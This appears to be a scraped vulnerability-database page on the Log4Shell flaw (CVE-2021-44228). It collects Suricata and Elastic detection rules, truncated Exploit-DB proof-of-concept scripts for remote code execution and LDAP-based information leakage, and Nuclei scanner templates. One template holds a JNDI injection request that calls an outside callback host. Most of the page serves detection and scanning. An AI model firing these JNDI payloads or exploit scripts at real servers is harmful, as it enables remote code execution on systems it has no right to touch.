Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower TCP Bypass) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034665; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_12_11;)
Suricata
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
suricata·2021-12-11·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET HUNTING Possible Apache log4j RCE Attempt - Any Protocol (lower UDP Bypass) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|"; nocase; fast_pattern; content:"|24 7b|lower|3a|"; distance:0; reference:cve,2021-44228; classtype:misc-activity; sid:2034666; rev:1; metadata:created_at 2021_12_11, cve CVE_2021_44228, confidence Medium, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_02_16;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|rmi|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)
Rule: alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldaps|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)
Rule: alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)"; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|ldap|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)
suricata·2021-12-10·CVSS 10.0
CVE-2021-44228 [CRITICAL] ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)
ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)"; flow:established,to_server; content:"|24 7b|jndi|3a|dns|3a 2f 2f|"; nocase; fast_pattern; reference:url,lunasec.io/docs/blog/log4j-zero-day/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_12_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Elastic
Linux Restricted Shell Breakout via Linux Binary(s)
elastic_rules
Linux Restricted Shell Breakout via Linux Binary(s)
Linux Restricted Shell Breakout via Linux Binary(s)
Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive
system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator,
and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary.
Query:
process where host.os.type == "linux" and event.type == "start" and process.executable != null and
(
/* launching shell from capsh */
(process.name == "capsh" and process.args == "--" and not process.parent.executable == "/usr/bin/log4j-cve-2021-44228-hotpatch") or
/* launching shells from unusual parents or parent+arg combos */
(process.name in ("bash", "dash", "ash", "sh", "tcsh", "cs
Exploit-DB
AD Manager Plus 7122 - Remote Code Execution (RCE)
exploitdb·2023-04-01·CVSS 10.0
CVE-2021-44228 [CRITICAL] AD Manager Plus 7122 - Remote Code Execution (RCE)
AD Manager Plus 7122 - Remote Code Execution (RCE)
---
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I have been doing security engagement on Synack
Red Team in the collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. Manage
Engine had already patched the Ad Manager Plus to prevent it from
being
Exploit-DB
Apache Log4j2 2.14.1 - Information Disclosure
exploitdb·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Log4j2 2.14.1 - Information Disclosure
Apache Log4j2 2.14.1 - Information Disclosure
---
# Exploit Title: Apache Log4j2 2.14.1 - Information Disclosure
# Date: 12/12/2021
# Exploit Author: leonjza
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Version: None:
print(f' i| new connection from {self.client_address[0]}')
sock = self.request
sock.recv(1024)
sock.sendall(LDAP_HEADER)
data = sock.recv(1024)
data = data[9:] # strip header
# example response
#
# ('Java version 11.0.13\n'
# '\x01\x00\n'
# '\x01\x03\x02\x01\x00\x02\x01\x00\x01\x01\x00\x0b'
# 'objectClass0\x00\x1b0\x19\x04\x172.16.840.1.113730.3.4.2')
data = data.decode(errors='ignore').split('\n')[0]
print(f' v| extracted value: {data}')
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def main():
parser = argparse.Ar
Exploit-DB
Apache Log4j 2 - Remote Code Execution (RCE)
exploitdb·2021-12-14·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Log4j 2 - Remote Code Execution (RCE)
Apache Log4j 2 - Remote Code Execution (RCE)
---
# Exploit Title: Apache Log4j 2 - Remote Code Execution (RCE)
# Date: 11/12/2021
# Exploit Authors: kozmer, z9fr, svmorris
# Vendor Homepage: https://logging.apache.org/log4j/2.x/
# Software Link: https://github.com/apache/logging-log4j2
# Version: versions 2.0-beta-9 and 2.14.1.
# Tested on: Linux
# CVE: CVE-2021-44228
# Github repo: https://github.com/kozmer/log4j-shell-poc
import subprocess
import sys
import argparse
from colorama import Fore, init
import subprocess
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler
init(autoreset=True)
def listToString(s):
str1 = ""
try:
for ele in s:
str1 += ele
return str1
except Exception as ex:
parser.print_help()
sys.exit()
def payload(userip , webport , lport):
ge
Nuclei
OpenNMS - JNDI Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] OpenNMS - JNDI Remote Code Execution (Apache Log4j)
OpenNMS - JNDI Remote Code Execution (Apache Log4j)
OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: opennms-log4j-rce
info:
name: OpenNMS - JNDI Remote Code Execution (Apache Log4j)
author: johnk3r
severity: critical
description: |
OpenNMS JNDI is susceptible to remote code execution via Apache Log4j 2.14.1 and before. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
reference:
- https://www.horizon3.ai/the-long-tail-of-log4shell-exploitation/
- https://www.
Nuclei
Jitsi Meet - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Jitsi Meet - Remote Code Execution (Apache Log4j)
Jitsi Meet - Remote Code Execution (Apache Log4j)
Jitsi Meet is susceptible to Log4j JNDI remote code execution. Jitsi is a collection of free and open-source multiplatform voice, video conferencing and instant messaging applications for the Web platforms.
Template:
id: jitsi-meet-log4j-rce
info:
name: Jitsi Meet - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Jitsi Meet is susceptible to Log4j JNDI remote code execution. Jitsi is a collection of free and open-source multiplatform voice, video conferencing and instant messaging applications for the Web platforms.
reference:
- https://github.com/jitsi/security-advisories/blob/4e1ab58585a8a0593efccce77d5d0e22c5338605/advisories/JSA-2021-0004.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/
Nuclei
Okta - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Okta - Remote Code Execution (Apache Log4j)
Okta - Remote Code Execution (Apache Log4j)
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
Template:
id: okta-log4j-rce
info:
name: Okta - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
reference:
- https://sec.okta.com/articles/2021/12/log4shell
classification:
cvss-metri
Nuclei
Apache Solr 7+ - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Solr 7+ - Remote Code Execution (Apache Log4j)
Apache Solr 7+ - Remote Code Execution (Apache Log4j)
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
Template:
id: apache-solr-log4j-rce
info:
name: Apache Solr 7+ - Remote Code Execution (Apache Log4j)
author: Evan Rubinstein,nvn1729,j4vaovo
severity: critical
description: |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
reference:
- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
- https://twitter.com/sirifu4k1/status/1470011568
Nuclei
JamF (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] JamF (Log4j) - Remote Code Execution
JamF (Log4j) - Remote Code Execution
JamF is susceptible to remote code execution via the Apache log4j library. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache
Nuclei
JamF Pro - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] JamF Pro - Remote Code Execution (Apache Log4j)
JamF Pro - Remote Code Execution (Apache Log4j)
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
Template:
id: jamf-pro-log4j-rce
info:
name: JamF Pro - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK,pdteam
severity: critical
description: |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
reference:
- https://github.com/random-robbie/jamf-log4j
- https://docs.jamf.com/technical-articles/Mitigating_the_Apache_Log4j_2_Vulnerability.
Nuclei
Sonicwall NSM - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Sonicwall NSM - Remote Code Execution (Apache Log4j)
Sonicwall NSM - Remote Code Execution (Apache Log4j)
Sonicwall NSM is susceptible to Log4j JNDI remote code execution. SonicWall Network Security Manager (NSM) allows you to centrally orchestrate all firewall operations error-free, see and manage threats and risks across your firewall ecosystem from one place, and stay connected and compliant.
Template:
id: sonicwall-nsm-log4j-rce
info:
name: Sonicwall NSM - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Sonicwall NSM is susceptible to Log4j JNDI remote code execution. SonicWall Network Security Manager (NSM) allows you to centrally orchestrate all firewall operations error-free, see and manage threats and risks across your firewall ecosystem from one place, and stay connected and compliant.
Nuclei
Citrix XenMobile Server - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Citrix XenMobile Server - Remote Code Execution (Apache Log4j)
Citrix XenMobile Server - Remote Code Execution (Apache Log4j)
XenMobile Server is an on-premises enterprise mobility management solution and versions 10.14 RP2, 10.13 RP5 and 10.12 RP10 are vulnerable to CVE-2021-44228 (Apache Log4j). JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: xenmobile-server-log4j-rce
info:
name: Citrix XenMobile Server - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: XenMobile Server is an on-premises enterprise mobility management solution and v
Nuclei
Cisco CloudCenter Suite (Log4j) - Remote Code Execution
nuclei·CVSS 10.0
CVE-2021-44228 Cisco CloudCenter Suite (Log4j) - Remote Code Execution
Cisco CloudCenter Suite (Log4j) - Remote Code Execution
Cisco CloudCenter Suite is susceptible to remote code execution via the Apache Log4j library. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: cisco-cloudcenter-suite-log4j-rce
info:
name: Cisco CloudC
Nuclei
Apache Druid - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Druid - Remote Code Execution (Apache Log4j)
Apache Druid - Remote Code Execution (Apache Log4j)
Apache Druid is vulnerable to RCE due to Log4j.
Template:
id: apache-druid-log4j-rce
info:
name: Apache Druid - Remote Code Execution (Apache Log4j)
author: SleepingBag945
severity: critical
description: Apache Druid is vulnerable to RCE due to Log4j.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77,CWE-502
cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Apache Druid"
product: druid
vendor: apache
tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast,kev,vuln
http:
- method: DELETE
path:
- "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"
matchers-conditi
Nuclei
Apache Log4j2 Remote Code Injection
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Apache Log4j2 Remote Code Injection
Apache Log4j2 Remote Code Injection
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Template:
id: CVE-2021-44228
info:
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea,j4vaovo
severity: critical
description: |
Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can ex
Nuclei
Cisco Unified Communications - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Cisco Unified Communications - Remote Code Execution (Apache Log4j)
Cisco Unified Communications - Remote Code Execution (Apache Log4j)
Cisco Unified Communications is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: cisco-unified-communications-log4j-rce
info:
name: Cisco Unified Communications - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: Cisco Unified Communications is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
referen
Nuclei
Apache Log4j2 - Remote Code Injection
nuclei·CVSS 10.0
CVE-2021-45046 [CRITICAL] Apache Log4j2 - Remote Code Injection
Apache Log4j2 - Remote Code Injection
Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
Template:
id: CVE-2021-45046-DAST
info:
name: Apache Log4j2 - Remote Code Injection
author: princechaddha
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
impact: |
Attackers can achieve remote code execution in non-default Log4j2 configurations through Thread Context Lookup Pattern manipulation, potentially compromising application servers.
remediation: |
Upgrade Apache Log4j2 to version 2.17.0 or later that completely removes support for Message Lookups and disables JNDI by default.
reference:
- https://securitylab.github.c
Nuclei
Rundeck - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Rundeck - Remote Code Execution (Apache Log4j)
Rundeck - Remote Code Execution (Apache Log4j)
Rundeck is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: rundeck-log4j-rce
info:
name: Rundeck - Remote Code Execution (Apache Log4j)
author: DhiyaneshDK
severity: critical
description: Rundeck is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference:
- https://docs.rundeck.com/docs/history/CVEs/log4j.html
- https://logging.apache.org/log4j/2.x/securi
Nuclei
Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices
Template:
id: manage-engine-dc-log4j-rce
info:
name: Manage Engine Desktop Central - Remote Code Execution (Apache Log4j)
author: shaikhyaser
severity: critical
description: |
Manage Engine Endpoint Central (formerly Desktop Central) is susceptible to Log4j JNDI remote code execution. Endpoint Central is a Unified Endpoint Management (UEM) & Endpoint protection suite that helps manage and secure various network devices
reference:
- https://pitstop.manageengine.com/portal/en/c
Nuclei
OpenShift - Remote Code Execution (Apache Log4j)
nuclei·CVSS 10.0
CVE-2021-44228 [CRITICAL] OpenShift - Remote Code Execution (Apache Log4j)
OpenShift - Remote Code Execution (Apache Log4j)
